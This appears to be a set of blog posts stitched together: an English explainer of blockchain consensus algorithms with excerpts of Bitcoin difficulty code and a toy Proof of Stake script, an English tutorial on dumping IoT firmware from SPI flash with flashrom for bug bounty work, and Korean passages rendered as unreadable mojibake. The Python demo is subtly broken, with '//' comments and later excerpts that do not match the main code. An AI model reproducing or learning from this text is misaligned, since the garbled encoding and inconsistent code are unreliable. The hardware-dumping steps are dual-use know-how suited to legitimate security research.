๋ธ๋ก์ฒด์ธ์ ๊ณต๋ถํ์ ๋ถ๋ค์ ๋น์ํด ์ฅ๊ตฐ ๋ฌธ์ (Byzantine General Problems)์ ๋ํด์๋ ๋ค์ด๋ณด์ จ์ ๊ฒ ๊ฐ์๋ฐ์.
๋น์ํด ์ฅ๊ตฐ ๋ฌธ์ ๋ฅผ ํด๊ฒฐํ๊ธฐ ์ํด ๊ณ ์๋ ๋น์ํด ์ฅ์ ๋ฌธ์ ๋ ๋ค์๊ณผ ๊ฐ์ต๋๋ค.
PBFT(Practical Byzantine Fault Tolerance)๋ ๋คํธ์ํฌ์์ ์ผ๋ถ ๋
ธ๋๊ฐ ์๋ตํ์ง ์๊ฑฐ๋ ์๋ชป๋ ์ ๋ณด๋ก ์๋ตํ๋๋ผ๋ ์์ ํ๊ฒ ํฉ์๋ฅผ ์ด๋ฃจ๋ ์๊ณ ๋ฆฌ์ฆ์
๋๋ค. ํนํ, 3f+1 ๊ฐ์ ๋
ธ๋๊ฐ ์กด์ฌํ ๋ f๊ฐ์ ์
์์ ์ธ(๋น์ํด) ๋
ธ๋๊ฐ ์์ด๋ ์์ ํ๊ฒ ์๋ํ ์ ์์ต๋๋ค. ์ด ํฉ์ ์๊ณ ๋ฆฌ์ฆ์ ๊ธฐ์กด์ PoW๋ PoS์ ๋ฌ๋ฆฌ ์ฐ์ฐ ๊ฒฝ์์ด ํ์ํ์ง ์๊ณ , ํฌํ ๊ธฐ๋ฐ์ผ๋ก ํฉ์๋ฅผ ์ํํด ๋น ๋ฅธ ํธ๋์ญ์
Finality๋ฅผ ๋ณด์ฅํ ์ ์์ต๋๋ค.
Figure 1. Byzantine Generals Problem Image [์ถ์ฒ: ๋ ผ๋ฌธ ์ฒจ๋ถ]
PBFT๋ ํด๋ผ์ด์ธํธ(Client)์ ๋ณต์ ๋ณธ(Replicas) ์ผ๋ก ๊ตฌ์ฑ๋๋ฉฐ, ๋ณต์ ๋ณธ ์ค ํ๋๊ฐ ๋ฆฌ๋(Primary) ๋ ธ๋ ์ญํ ์ ํฉ๋๋ค. ์ด๋ฅผ ์ํด 4๋จ๊ณ ํ๋กํ ์ฝ(Request, Pre-prepare, Prepare, Commit)์ ์ฌ์ฉํฉ๋๋ค. (f: ๋น์ํด ์ฅ์ ๊ฐ๋ฅ ๋ ธ๋ ์)
Request
Client๊ฐ ๋ฆฌ๋ ๋
ธ๋์ ์์ฒญ์ ๋ณด๋
๋๋ค.
Pre-Prepare
๋ฆฌ๋ ๋
ธ๋๋ ๋ชจ๋ ๋ณด์กฐ(๋ฐฑ์
) ๋
ธ๋์ ์์ฒญ์ ๋ธ๋ก๋์บ์คํธ ํฉ๋๋ค.์ด ๊ณผ์ ์์ ๋ฆฌ๋ ๋
ธ๋๊ฐ ์
์์ ์ด๋ผ๋ฉด ์๋ชป๋ ์์ฒญ์ ์ ํํ ์๋ ์์ง๋ง,์ดํ์ ๊ณผ์ ์์ ์ด๋ฅผ ๊ฒ์ฆํ๊ฒ ๋ฉ๋๋ค.
Prepare
๊ฐ ๋ณด์กฐ ๋
ธ๋๋ ๋ฆฌ๋ ๋
ธ๋๊ฐ ๋ณด๋ธ Pre-Prepare ๋ฉ์์ง๋ฅผ ๊ฒ์ฆํ ๋ค, ๋ค๋ฅธ ๋
ธ๋๋ค์๊ฒ PREPARE ๋ฉ์์ง๋ฅผ ๋ณด๋
๋๋ค. ์ด ๋, ๋
ธ๋๋ค์ ๋์ผํ ์์ฒญ์ ๋ํด ์ต์ 2f+1๊ฐ์ PREPARE ๋ฉ์์ง๋ฅผ ๋ฐ์ผ๋ฉด ์ ๋ขฐํ ์ ์์ต๋๋ค.
Commit
๊ฐ ๋ณด์กฐ ๋
ธ๋๋ 2f+1๊ฐ์ PREPARE ๋ฉ์์ง๋ฅผ ๋ฐ์ผ๋ฉด ์์ฒญ์ ์ ๋ขฐํ๊ณ , ๋ค๋ฅธ ๋
ธ๋๋ค์๊ฒ COMMIT ๋ฉ์์ง๋ฅผ ์ ์กํฉ๋๋ค. ๋
ธ๋๋ค์ ๋์ผํ ์์ฒญ์ ๋ํด 2f+1 ๊ฐ์ COMMIT ๋ฉ์์ง๋ฅผ ๋ฐ์ผ๋ฉด ์์ฒญ์ ํ์ ํฉ๋๋ค.
Reply
Client๊ฐ f+1๊ฐ์ ์ผ์นํ๋ ์๋ต์ ๋ฐ์ผ๋ฉด, ํด๋น ์์ฒญ์ด ์ฑ๊ณต์ ์ผ๋ก ์ฒ๋ฆฌ๋์์์ ํ์ธํฉ๋๋ค.
PBFT๋ ๋น ๋ฅธ ํธ๋์ญ์
ํ์ ๊ณผ ๋์ ๋ณด์์ฑ์ ์ ๊ณตํ๋ ํฉ์ ์๊ณ ๋ฆฌ์ฆ์ด์์. PoW๋ PoS์ ๋ฌ๋ฆฌ ์ฐ์ฐ ๊ฒฝ์์ด ์๊ณ , 1/3 ์ดํ์ ๋น์ํด ์ฅ์ ๋ฅผ ํ์ฉํ๋ฉด์๋ ๋คํธ์ํฌ๋ฅผ ์์ ์ ์ผ๋ก ์ด์ํ ์ ์๋ค๋ ์ฅ์ ์ด ์์ด์. ํ์ง๋ง ๋คํธ์ํฌ๊ฐ ์ปค์ง์๋ก ํฉ์ ๊ณผ์ ์ด ๋๋ ค์ง๊ธฐ ๋๋ฌธ์ ํ์ฅ์ฑ์ด ์ ํ๋๋ ๋จ์ ๋ ์์ต๋๋ค.
PBFT๋ Hyperledger Fabric, Zilliqa ๋ฑ์์ ์ฌ์ฉํ๊ณ ์์ผ๋ฉฐ, ํ๋ผ์ด๋น ๋ธ๋ก์ฒด์ธ์ด๋ ์๊ท๋ชจ ๋
ธ๋ ๋คํธ์ํฌ์์ ์ ํฉํ ํฉ์ ์๊ณ ๋ฆฌ์ฆ์ผ๋ก ํ๊ฐ๋ฐ๊ณ ์์ด์.
์ง๊ธ๊น์ง 5๊ฐ์ง ๋ธ๋ก์ฒด์ธ ํฉ์ ์๊ณ ๋ฆฌ์ฆ์ ์์๋ณด์์ด์! ์์ธํ๊ฒ ์ค๋ช
ํ ๊ฒ๋ ์๊ณ , ๊ทธ๋ ์ง ์์ ๊ฒ๋ ์๋๋ฐ, ์๋ฌด๋๋ ๊ณต๋ถ๋ฅผ ํ๋ฉด์ ๊ฐ์ฅ ์ต์ํ ๊ฑด ์์
์ฆ๋ช
๊ณผ ์ง๋ถ ์ฆ๋ช
์ด์๋์ง๋ผ ๋ด์ฉ์ด ์กฐ๊ธ ๋ง๋ค์. ์ด์ธ์๋ ๋ง์ ํฉ์ ์๊ณ ๋ฆฌ์ฆ์ด ์๋๋ฐ, ์ค๋์ ์ ์๋ ค์ง 5๊ฐ์ง๋ง ๋ค๋ค๋ณด์์ต๋๋ค.
๊ธด ๊ธ ์ฝ์ด์ฃผ์
์ ๊ฐ์ฌํ๊ณ ํฅ๋ฏธ๋ก์ด ๋ด์ฉ์ด ์์ผ๋ฉด ๋ ์ ๋ฆฌํด๋ณด๊ฒ ์ต๋๋ค! ๊ฐ์ฌํฉ๋๋ค ๐
Hello! Itโs bekim.
In my previous post, I briefly explained that transactions in the Bitcoin network become possible by adding new blocks through a mechanism called โProof of Work.โ. But, PoW isn\โt the only consensus algorithm available. Actually there are actually many different consensus algorithms used in blockchain systems.
A consensus algorithm is basically the mechanism by which participants in a blockchain network agree on choosing a single valid block and maintaining the chain.
In this post, Iโll introduce various consensus algorithms: PoW, PoS, DPoS, PBFT, and Hybrid PoW/PoS.
To explain this a bit further, Proof of Work is a method where participants (miners) need to find a hash value that meets a specific difficulty requirement. This mechanism was first introduced by Bitcoin. Miners repeatedly adjust a Nonce value, attempting to find a hash that matches the target difficulty.
Bitcoin aims to generate a new block roughly every 10 minutes. To keep this timing consistent, the network automatically adjusts the mining difficulty approximately every two weeks (every 2016 blocks)
Now, letโs take a closer look at how Proof of Work (PoW) functions in Bitcoinโs latest implementation.
unsigned int GetNextWorkRequired(const CBlockIndex* pindexLast, const CBlockHeader *pblock, const Consensus::Params& params){ assert(pindexLast != nullptr); unsigned int nProofOfWorkLimit = UintToArith256(params.powLimit).GetCompact();// Only change once per difficulty adjustment interval // [1] if ((pindexLast->nHeight+1) % params.DifficultyAdjustmentInterval() != 0) { if (params.fPowAllowMinDifficultyBlocks) { // Special difficulty rule for testnet: // If the new block's timestamp is more than 2* 10 minutes // then allow mining of a min-difficulty block. // [2] if (pblock->GetBlockTime() > pindexLast->GetBlockTime() + params.nPowTargetSpacing*2) return nProofOfWorkLimit; else { // Return the last non-special-min-difficulty-rules-block // [3] const CBlockIndex* pindex = pindexLast; while (pindex->pprev && pindex->nHeight % params.DifficultyAdjustmentInterval() != 0 && pindex->nBits == nProofOfWorkLimit) pindex = pindex->pprev; return pindex->nBits; } } // [4] return pindexLast->nBits; } // Go back by what we want to be 14 days worth of blocks // [5] int nHeightFirst = pindexLast->nHeight - (params.DifficultyAdjustmentInterval()-1); assert(nHeightFirst >= 0); const CBlockIndex* pindexFirst = pindexLast->GetAncestor(nHeightFirst); assert(pindexFirst); return CalculateNextWorkRequired(pindexLast, pindexFirst->GetBlockTime(), params);}
pindexLast->nHeight+1
) is not a multiple of 2016 (params.DifficultyAdjustmentInterval()
), Bitcoin retains the difficulty level (pindexLast->nBits
)[4] from the previous block without any adjustment.nProofOfWorkLimit
).const CBlockIndex* pindex = pindexLast;while (pindex->pprev && pindex->nHeight % params.DifficultyAdjustmentInterval() != 0 && pindex->nBits == nProofOfWorkLimit) pindex = pindex->pprev;return pindex->nBits;
For this purpose, Bitcoin checks the most recently added block (pindexLast
) and traces back from there. While traversing backward through previous blocks, Bitcoin skips blocks where the difficulty was temporarily reduced to the minimum (pindex->nBits == nProofOfWorkLimit
). Specifically, it continues moving backward through blocks that havenโt yet reached the difficulty adjustment interval (pindex->nHeight % params.DifficultyAdjustmentInterval() != 0
) until it finds a block where an actual difficulty adjustment occurred. At that point, it stops searching and uses that blockโs difficulty as a reference.
[5] However, if the current block height (pindexLast->nHeight
) is a multiple of the difficulty adjustment interval (2016 blocks), Bitcoin recalculates the difficulty level instead of using the previous one.
Bitcoin is designed so that if the previous 2016 blocks were generated faster than expected, the difficulty increases. On the other hand, if those blocks were generated more slowly than expected, the difficulty is lowered.
unsigned int CalculateNextWorkRequired(const CBlockIndex* pindexLast, int64_t nFirstBlockTime, const Consensus::Params& params){ if (params.fPowNoRetargeting) return pindexLast->nBits; // Limit adjustment step // [1] int64_t nActualTimespan = pindexLast->GetBlockTime() - nFirstBlockTime; // [2] if (nActualTimespan < params.nPowTargetTimespan/4) nActualTimespan = params.nPowTargetTimespan/4; if (nActualTimespan > params.nPowTargetTimespan*4) nActualTimespan = params.nPowTargetTimespan*4; // Retarget const arith_uint256 bnPowLimit = UintToArith256(params.powLimit); arith_uint256 bnNew; // Special difficulty rule for Testnet4 // [3] if (params.enforce_BIP94) { // Here we use the first block of the difficulty period. This way // the real difficulty is always preserved in the first block as // it is not allowed to use the min-difficulty exception. int nHeightFirst = pindexLast->nHeight - (params.DifficultyAdjustmentInterval()-1); const CBlockIndex* pindexFirst = pindexLast->GetAncestor(nHeightFirst); bnNew.SetCompact(pindexFirst->nBits); } else { bnNew.SetCompact(pindexLast->nBits); }// [4] bnNew *= nActualTimespan; bnNew /= params.nPowTargetTimespan;// [5] if (bnNew > bnPowLimit) bnNew = bnPowLimit; return bnNew.GetCompact();}
pindexLast->GetBlockTime()
) with the timestamp from 2016 blocks ago (nFirstBlockTime
) to calculate the actual time taken to generate the previous 2016 blocks, storing this result in nActualTimespan
. This value serves as the basis for adjusting the difficulty later.int64_t nActualTimespan = pindexLast->GetBlockTime() - nFirstBlockTime;
[2] Bitcoin measures nActualTimespan
and compares it to the target time (params.nPowTargetTimespan
) to adjust the difficulty. To prevent drastic changes in difficulty, the adjustment is limitedโdifficulty can only increase up to 1/4 of the target time or decrease up to 4 times the target time.
if (nActualTimespan < params.nPowTargetTimespan/4) nActualTimespan = params.nPowTargetTimespan/4;if (nActualTimespan > params.nPowTargetTimespan*4) nActualTimespan = params.nPowTargetTimespan*4;
params.enforce_BIP94
.pindexFirst->nBits
) is used as the reference. This helps prevent exceptional cases where the difficulty could drop to the minimum value. If the rule is not applied, the difficulty of the current block (pindexLast->nBits
) is used instead.if (params.enforce_BIP94) { // Here we use the first block of the difficulty period. This way // the real difficulty is always preserved in the first block as // it is not allowed to use the min-difficulty exception. int nHeightFirst = pindexLast->nHeight - (params.DifficultyAdjustmentInterval()-1); const CBlockIndex* pindexFirst = pindexLast->GetAncestor(nHeightFirst); bnNew.SetCompact(pindexFirst->nBits);} else { bnNew.SetCompact(pindexLast->nBits);}
BIP (Bitcoin Improvement Proposal): A proposal for improving the Bitcoin protocol. BIP94 is one of these proposals and is designed to prevent the difficulty from dropping excessively in certain networks (such as Testnet4) during difficulty adjustments.
[4] After that, Bitcoin calculates the new difficulty using the nActualTimespan
value. Bitcoin sets the target block generation time to 10 minutes, and assuming 2016 blocks are created, the target time (params.nPowTargetTimespan
) is approximately two weeks (1,209,600 seconds). The difficulty is then adjusted based on the ratio between the actual block generation time and the target time.
bnNew *= nActualTimespan;bnNew /= params.nPowTargetTimespan;
By applying this formula, Bitcoin ensures that the average block generation time stays around 10 minutes.
[5] Plus, to prevent the difficulty from dropping too low, it is restricted from falling below the minimum difficulty (bnPowLimit
).
if (bnNew > bnPowLimit) bnNew = bnPowLimit;
Proof of Stake (PoS) is a consensus algorithm that grants block creation and validation rights based on the amount of cryptocurrency a user holds and how long theyโve held it.
In PoW, miners have to solve complex mathematical problems, but in PoS, users can participate as validators by staking a certain amount of the networkโs cryptocurrency. The more coins a validator stakes, the higher their chances of being selected to create a new block. PoS also enhances security through economic incentives. honest validators receive rewards, while those who engage in fraudulent activities face penalties, such as losing a portion of their staked funds.
The PoS concept was first implemented in Peercoin in 2012, and many blockchains have adopted it since then. In 2022, Ethereum also transitioned from PoW to PoS.
I was going to use Ethereum as an example to explain how PoS works, but analyzing its code would make this post way too long. So instead, letโs break it down using a highly simplified version of the PoS consensus algorithm to understand the core principles.
import randomimport hashlibimport time// [1]class Validator: def __init__(self, address, stake): self.address = address # Validator address self.stake = stake self.vote_weight = stake def __repr__(self): return f"Validator({self.address}, Stake: {self.stake})"class PoSBlockchain: def __init__(self): self.validators = [] self.blocks = [] def register_validator(self, address, stake): if stake < 32: print(f"[ERROR] {address} need to stake over 32 ETH") return validator = Validator(address, stake) self.validators.append(validator) print(f"[INFO] {validator} registered as a validator.")// [2] def select_proposer(self): """ Randomly select a block proposer """ total_stake = sum(v.stake for v in self.validators) rand_value = random.uniform(0, total_stake) cumulative = 0 for validator in self.validators: cumulative += validator.stake if rand_value <= cumulative: print(f"[INFO] selected validator: {validator.address}") return validator// [3] def create_block(self, proposer): """ Generate a block and calculate hash """ prev_hash = self.blocks[-1]['hash'] if self.blocks else "GENESIS" timestamp = time.time() block_data = f"{proposer.address}-{timestamp}-{prev_hash}" block_hash = hashlib.sha256(block_data.encode()).hexdigest() block = {"proposer": proposer.address, "hash": block_hash, "prev_hash": prev_hash} return block// [4] def validate_and_vote(self, block): votes = 0 for validator in self.validators: if random.random() > 0.1: # 90% probability of a valid vote votes += validator.vote_weight required_votes = sum(v.stake for v in self.validators) * 0.67 # At least 67% approval required if votes >= required_votes: self.blocks.append(block) print(f"[INFO] Validation: {block['hash']}") return True else: print("[WARNING] Not enough votes ") return False// [5] def run_consensus(self): proposer = self.select_proposer() if proposer: new_block = self.create_block(proposer) self.validate_and_vote(new_block)pos_chain = PoSBlockchain()pos_chain.register_validator("Alice", 50)pos_chain.register_validator("Bob", 40)pos_chain.register_validator("Charlie", 32)pos_chain.register_validator("Dave", 100)for _ in range(3): pos_chain.run_consensus()
[1] In Ethereum, you need to stake 32 ETH to participate as a validator.
class Validator: def __init__(self, address, stake): self.address = address self.stake = stake def __repr__(self): return f"Validator({self.address}, Stake: {self.stake})"
[2] Participants who stake more coins have a higher chance of being selected as the next block validator, but the selection process also involves randomization algorithms to make it unpredictable and harder to manipulate
def select_proposer(self): """Select a block proposer randomly, weighted by stake""" total_stake = sum(v.stake for v in self.validators.values()) rand_value = random.uniform(0, total_stake) cumulative = 0 for validator in self.validators.values(): cumulative += validator.stake if rand_value <= cumulative: print(f"[INFO] Selected proposer: {validator.address}") return validator return None
[3] The selected validator bundles new transactions, creates a block, and proposes it to the blockchain.
def create_block(self, proposer): """Generate a new block""" prev_hash = self.blockchain[-1]['Hash'] new_block = { "Index": len(self.blockchain), "Timestamp": str(datetime.now()), "PrevHash": prev_hash, "Validator": proposer.address } new_block["Hash"] = self.hash_block(new_block) return new_block
[4] Other validators participate in the consensus process by verifying the blockโs validity and voting on it. In Ethereum, at least 128 validators must review and vote on a block. Once enough consensus is reached through this voting process, the block is added to the blockchain.
def validate_and_vote(self, block): """Simulate validator voting process""" total_stake = sum(v.stake for v in self.validators.values()) votes = sum(v.stake for v in self.validators.values() if random.random() > 0.1) # # 90% chance to approve if votes >= total_stake * 0.67: # Requires at least 67% approval self.blockchain.append(block) print(f"[INFO] Block added: {block['Hash']}") return True else: print("[WARNING] Block rejected due to insufficient votes.") return False
[5] Validators who successfully create a valid block receive transaction fees and network rewards as compensation.
def run_consensus(self): """Run the PoS consensus process""" proposer = self.select_proposer() if proposer: new_block = self.create_block(proposer) self.validate_and_vote(new_block) proposer.stake += 5 # reward print(f"[INFO] {proposer.address} received 5 ETH as a reward.")
Because of this system, PoS helps maintain the security and integrity of the network while being more energy-efficient than PoW. However, PoS has its own limitations. Those who hold more coins tend to have a continuous advantage, leading to potential centralization risks in the network.
Complete Overview of Decredโs Structure [Source: https://medium.com/decred/blockchain-governance-how-decred-iterates-upon-bitcoin-3cc7030c655e]
The traditional PoW provides high security but has high energy consumption and the issue of mining monopolization. On the other hand, the PoS method is energy-efficient but comes with the risk of validator monopoly. To solve this, the Hybrid PoW/PoS model emerged. In this method, PoW is used to generate blocks, while PoS validators approve them.
First, a miner performs computations using the Proof-of-Work method to create a new block. However, the created block is not immediately added to the chain but goes through a final approval process via the PoS validatorsโ vote. PoS validators participate by staking a certain amount of the cryptocurrency they hold, and randomly selected validators evaluate the validity of the block and vote on it. Typically, if at least 3 out of 5 validators approve, the block is validated and added to the blockchain. The rewards are distributed to both PoW miners and PoS validators. For example, in Decred (DCR), 60% of the reward is given to PoW miners, 30% goes to PoS validators, and the remaining 10% is allocated to the network development fund. Through this, excessive monopolization by PoW miners is prevented, and PoS validators are incentivized to actively participate in maintaining the network.
By combining PoWโs high security with PoSโs energy efficiency, this structure strengthens resistance against 51% attacks and mitigates validator centralization issues.
Delegated Proof of Stake (DPoS) is an improved version of the traditional PoS consensus algorithm, designed to make transaction verification and block generation in blockchain networks more efficient. Instead of users directly creating blocks, DPoS allows them to elect delegates, who are then entrusted with the responsibility of validating transactions and generating blocks.
First, all token holders vote based on their stake to elect delegates. These elected delegates take turns generating and validating blocks in a fixed order, playing a key role in maintaining the network.
In this system, the integrity of the delegates is crucial. Voting is an ongoing process, and if a delegate fails to create blocks or engages in dishonest behavior, token holders can replace them through re-elections. Because DPoS operates in a more democratic manner and delegates take turns producing blocks, it achieves faster block finalization times, leading to better network performance. Additionally, since there is no mining competition, energy consumption is significantly lower compared to PoW. However, since the number of delegates is limited, DPoS carries a higher risk of centralization compared to PoW or PoS. If a small group of delegates collude, it could undermine the fairness of the network.
Notable DPoS-based blockchains include EOS and TRON, as well as projects like Steem and Lisk, which also utilize DPoS. In these systems, a fixed number of delegates manage the network and execute the consensus process efficiently.
Those who have studied blockchain may have heard of the Byzantine Generals Problem.
The Byzantine fault tolerance problem was designed to address this issue and is described as follows:
Thus, the generals need a reliable communication method (algorithm) that enables them to reach a correct agreement in any situation.
This is the essence of the โByzantine Generals Problem.โ
PBFT (Practical Byzantine Fault Tolerance) is a consensus algorithm designed to ensure secure agreement within a network, even if some nodes fail to respond or provide incorrect information. In particular, when there are 3f + 1 nodes, the system can remain secure and functional even if up to f nodes are malicious (Byzantine). Unlike PoW or PoS, this consensus algorithm does not require computational competition. Instead, it operates based on a voting system, allowing for faster transaction finality.
Figure 1. Byzantine Generals Problem Image [Source: Attached research paper]
PBFT consists of clients and replicas, with one of the replicas acting as the leader (Primary) node. To achieve consensus, it follows a four-step protocol: Request, Pre-prepare, Prepare, and Commit. (f: The number of nodes that can exhibit Byzantine faults)
Request
The client sends a request to the leader node.
Pre-Prepare
The leader node broadcasts the request to all backup nodes. At this stage, if the leader node is malicious, it could propagate an incorrect request. However, the following steps will verify its validity.
Prepare
Each backup node verifies the Pre-Prepare message sent by the leader node and then broadcasts a PREPARE message to the other nodes. At this stage, a node considers the request trustworthy if it receives at least 2f + 1 PREPARE messages for the same request.
Commit
Each backup node considers the request trustworthy once it receives 2f + 1 PREPARE messages and then sends a COMMIT message to the other nodes. Nodes finalize the request when they receive 2f + 1 COMMIT messages for the same request.
Reply
The client confirms that the request has been successfully processed once it receives f + 1 matching responses.
PBFT is a consensus algorithm that provides fast transaction finality and high security. Unlike PoW or PoS, it does not rely on computational competition and can maintain network stability even with up to one-third Byzantine faults. However, as the network grows, the consensus process slows down, making scalability a major limitation. PBFT is used in Hyperledger Fabric, Zilliqa, and other blockchain projects. It is considered a suitable consensus algorithm for private blockchains and small-scale node networks.
Weโve explored 5 different blockchain consensus algorithms so far. Some were explained in detail, while others were covered more briefly. Since Proof of Work (PoW) and Proof of Stake (PoS) are the most familiar ones from my studies, I ended up writing a bit more about them.
Of course, there are many other consensus algorithms out there, but for today, I focused on these five well-known ones.
Thanks for reading this long post! If I come across more interesting topics, Iโll make sure to summarize them again. ๐
Hello! Iโm newp1ayer48
, and itโs a pleasure to introduce myself! ๐๐ป
The start of IoT / Embedded hacking and its most crucial part is obtaining the firmware.
Firmware is essential because, with it, you can understand how the device operates, analyze the vectors where vulnerabilities may arise, and analyze the code.
There are several ways to obtain firmware, but here are some representative methods:
Flash memory is a chip typically used for storage purposes and is commonly found in IoT devices in an 8-pin form.
Since the firmware is ultimately stored in this Flash Memory chip, directly extracting the firmware from Flash Memory has the advantage of being a more reliable method.
Using the flashrom program, you can easily extract the firmware from Flash Memory.
However, this method can potentially damage the equipment and board, so you should proceed with caution. โ ๏ธ
Because heat is applied directly to the board using tools like soldering irons or heat guns, there is a risk of damaging the chip or the board, and improper connections may lead to short circuits.
Due to these risks, you may end up damaging IoT/embedded equipment that was purchased for bug bounty purposes.
Itโs somewhat like trying to extract a golden egg by cutting open a gooseโs belly, only to kill the goose in the processโฆ ๐ชฆ
If you need to extract firmware, itโs best to try the other methods mentioned above before opting for a Flash memory dump.
The flow for performing a Flash memory dump using flashrom is as follows: ๐
Hereโs a list of the required equipment and tools: ๐ธ
Flashrom is a development tool that allows you to flash data and images to flash chips.
It offers functions like detecting, reading, writing, verifying, and erasing, which makes it useful for embedded hacking to extract firmware from flash memory.
You need to install the necessary dependencies and use meson to install it on Raspberry Pi. ๐
Prepare your Raspberry Pi in 64-bit mode for installation.
sudo apt-get install -y gcc meson ninja-build pkg-config python3-sphinx libcmocka-dev libpci-dev libusb-1.0-0-dev libftdi1-dev libjaylink-dev libssl-devgit clone https://github.com/flashrom/flashrommeson setup builddirmeson compile -C builddirmeson test -C builddirmeson install -C builddir
When extracting the chip with flashrom, performing the dump while the chip is still attached to the board may result in unsuccessful extraction. ๐ป
The reason varies depending on the equipment and board, but usually, the Raspberry Pi provides power to the entire board, which may introduce noise signals that could interfere with the extraction process.
The following image shows the Raspberry Piโs VCC and GND pins touching the corresponding pins on the Flash Memory chip, confirming that power is supplied to the board.
For this reason, itโs better to remove the chip from the board and connect only the chip.
Use a heat gun to melt the solder and remove the chip from the board.
Be cautious during this process as the risk of damaging the board is quite high.
Typically, Flash memory used in low-power IoT and embedded devices is an 8-pin chip that uses SPI communication.
While the pin assignments may vary depending on the chip model and vendor, the function of the 8 pins is usually the same, so refer to the datasheet for the pinout.
The datasheet provides all the information for using and describing the chip, so make sure to consult it!
The roles of each of the 8 pins of Flash Memory are as follows: ๐
Connect the Raspberry Piโs GPIO pins to the Flash Memoryโs pins.
The VCC, Hold, and WP pins on the Flash Memory use the VCC power signal. Since Raspberry Piโs GPIO pins lack enough VCC pins, itโs more convenient to supply the VCC signal using a breadboard or similar method.
Use the IC Test Hook Clip to connect the pins and begin the extraction process.
The thinner the clip, the easier the connection, so itโs recommended to use a thin test clip.
Once everything is connected, execute the following command in the Raspberry Pi terminal to start the extraction process. ๐
# Check connection and check chip namesudo flashrom -p linux_spi:dev=/dev/spidev0.0,spispeed=2000 -V# extractionsudo flashrom -p linux_spi:dev=/dev/spidev0.0 -r [filename]sudo flashrom -p linux_spi:dev=/dev/spidev0.0 -c [Chipname] -r [filename]
If the chip is supported, flashrom will begin the extraction process immediately.
However, if the chip is not supported, you can check flashchips.h
and flashchips.c
. If the chip is not listed, you can add the chip manually and then build it for extraction.
Refer to the datasheet to add the chip information to the flashchips.c file.
const struct flashchip flashchips[] = {/* * .vendor= Vendor name * .name= Chip name * .bustype= Supported flash bus types (Parallel, LPC...) * .manufacture_id= Manufacturer chip ID * .model_id= Model chip ID * .total_size= Total size in (binary) kbytes * .page_size= Page or eraseblock(?) size in bytes * .tested= Test status * .probe= Probe function * .probe_timing= Probe function delay * .block_erasers[]= Array of erase layouts and erase functions * { *.eraseblocks[]= Array of { blocksize, blockcount } *.block_erase= Block erase function * } * .printlock= Chip lock status function * .unlock= Chip unlock function * .write= Chip write function * .read= Chip read function * .voltage= Voltage range in millivolt */
With this process, you can successfully dump the firmware stored in the chip!
After removing the Flash Memory chip, the device wonโt work until itโs reassembledโฆ
But! Reassembly is simply the reverse of disassembly!
Once the Flash Memory chip is properly (!) re-soldered, the device will be usable again!
By extracting the firmware and restoring the device, you can have the best of both worlds! ๐คฅ
Next, we will cover the commonly attempted UART/JTAG debugging port connections in embedded hacking!Thank you! ๐๐ป
์๋
ํ์ธ์! ์ด๋ฒ์ ์๋ก ์ธ์ฌ ๋๋ฆฌ๊ฒ ๋ newp1ayer48
์
๋๋ค! ๐๐ป
IoT / ์๋ฒ ๋๋ ํดํน์ ์์์ด์, ๊ฐ์ฅ ์ค์ํ ๋ถ๋ถ์ ํ์จ์ด๋ฅผ ํ๋ํ๋ ๊ฒ์ ๋๋ค.
ํ์จ์ด๊ฐ ์์ด์ผ ์ฅ๋น์ ๋์์ ์ดํดํ๊ณ ์ทจ์ฝ์ ์ด ๋ฐ์ํ๋ ๋ฒกํฐ์ ์ฝ๋๋ฅผ ๋ถ์ํ ์ ์๊ธฐ ๋๋ฌธ์ ์ค์ํฉ๋๋ค.
ํ์จ์ด๋ฅผ ํ๋ํ๋ ๋ฐฉ๋ฒ์ ์ฌ๋ฌ๊ฐ์ง๊ฐ ์กด์ฌํ์ง๋ง ๋ํ์ ์ธ ๋ฐฉ๋ฒ๋ค์ ์๋์ฒ๋ผ ์ ๋ฆฌํ ์ ์์ต๋๋ค.
Flash memory๋ ์ ์ฅ ๋ชฉ์ ์ผ๋ก ์ฃผ๋ก ์ฌ์ฉ๋๋ Chip์ผ๋ก IoT ๊ธฐ๊ธฐ์์๋ ๋ณดํต 8 pin ํํ๋ก ์กด์ฌํฉ๋๋ค.
ํ์จ์ด๋ ๊ฒฐ๊ตญ ์ด Flash Memory๋ผ๋ Chip์ ๋ค์ด ์๊ธฐ ๋๋ฌธ์, Flash Memory์์ ์ง์ ํ์จ์ด๋ฅผ ์ถ์ถํ๋ ๊ฒ์ด ํ์คํ๋ค๋ ์ฅ์ ์ด ์์ต๋๋ค.
์ฌ๊ธฐ์ flashrom ํ๋ก๊ทธ๋จ์ ์ด์ฉํ๋ฉด ์์ฝ๊ฒ Flash Memory ๋ด๋ถ์ ํ์จ์ด๋ฅผ ์ถ์ถํ ์ ์์ต๋๋ค.
๊ทธ๋ฌ๋ ์ด ๋ฐฉ๋ฒ์ ์ฅ๋น์ ๋ณด๋์ ์์์ ์ ๋ฐํ ์ ์๋ ๋ฐฉ๋ฒ์ด๊ธฐ์ ์ฃผ์ํ์ฌ ์๋ํด์ผ ํฉ๋๋ค. โ ๏ธ
์ธ๋๊ธฐ๋ ์ดํ๊ธฐ ๋ฑ์ผ๋ก ๋ณด๋์ ์ง์ ์ด์ ๊ฐํ๊ธฐ ๋๋ฌธ์ ์นฉ์ด๋ ๋ณด๋๊ฐ ํ ์๋ ์๊ณ , ์๋ชป๋ ์ฐ๊ฒฐ์ด ์ด๋ฃจ์ด์ง๋ฉด ํฉ์ ์ ์ํ๋ ์์ต๋๋ค.
์ด๋ฐ ๋ฌธ์ ๋ก ๋ฒ๊ทธ๋ฐ์ดํฐ๋ฅผ ์ํด ๊ตฌ์ ํ IoT/ ์๋ฒ ๋๋ ์ฅ๋น๋ฅผ ๋ง๊ฐ๋จ๋ฆด ์ ์์ต๋๋ค.
๋ง์น ํฉ๊ธ์์ ๊บผ๋ด๊ธฐ ์ํด ๊ฑฐ์ ๋ฐฐ๋ฅผ ๊ฐ๋๋ค๊ฐ, ๋๋ฆฌ์ด ๊ฑฐ์๋ง ์ฃฝ๊ฒ ๋์ด๋ฒ๋ฆฌ๋ ์ผ๊ณผ ๋น์ทํฉ๋๋คโฆ ๐ชฆ
ํ์จ์ด๋ฅผ ์ถ์ถํด์ผ ํ๋ค๋ฉด, ์์์ ์๊ฐํด๋๋ฆฐ ๋ค๋ฅธ ๋ฐฉ๋ฒ๋ค์ ๋จผ์ ์๋ํด๋ณด๊ณ Flash memory dump๋ฅผ ํ๋ ๊ฒ์ด ๋ฐ๋์งํฉ๋๋ค.
flashrom์ ์ด์ฉํ Flash memory dump์ ํ๋ฆ์ ์๋์ ๊ฐ์ต๋๋ค. ๐
